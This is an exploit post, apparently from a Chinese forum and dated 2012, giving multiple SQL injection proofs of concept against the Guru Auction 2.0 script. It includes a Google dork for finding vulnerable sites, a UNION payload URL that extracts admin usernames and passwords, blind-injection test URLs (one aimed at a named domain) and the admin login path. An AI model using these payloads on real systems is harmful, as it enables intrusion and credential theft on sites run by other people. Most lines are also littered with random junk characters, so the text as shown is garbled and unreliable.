Guru Auction 2.0 Multiple SQL Injection Vulnerabilities4 U+ I7 E* v8 q M }
& W: h5 H8 k0 G E# D1 R( @
作者 : v3n0m0 E N Q# g0 P: p! H7 r5 w
应用 : Guru Auction 2.0
/ Z9 t1 j+ w8 |. B& n# b$ ?: APrice : $499 ~: h3 n4 N: B" J$ M
Vendor : http://www.guruscript.com/$ L; j& \1 `' V! Z; D3 A( \ ]" y( I
Google Dork : inurl:subcat.php?cate_id=
1 X5 M O6 x; f, \# N" J
( E8 X' {& p# V6 T4 X0 t' PSQLi p0c:# x5 y" q V) w, t5 t0 J
~~~~~~~~~~9 t8 l+ @. m* L' ?6 c5 N: I
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
3 t5 l- a$ `8 d+ y$ y/ Q. s# N
, g$ N" J$ h) | ; e1 y/ ^1 H- y$ y3 o1 w+ T
盲注 p0c:
( r7 r; B6 N O: J~~~~~~~~~~
2 b8 H: l5 s$ r2 y; D& whttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
% G: t4 ]2 o! [& C; Khttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
" N, y- [/ R- s: F, Z
3 |8 l8 U( ?/ ?* r* s d0 W' A. f管理登录入口:
, {$ Y! [6 N5 ?0 a3 W~~~~~~~~~~/ f; F: W; l. `. t9 \" k# w* \# y( h
http://domain.tld/[path]/admin/) P3 D- l* g4 r2 l2 c
|
发表于 2012-12-31 09:24:05
收藏
支持
反对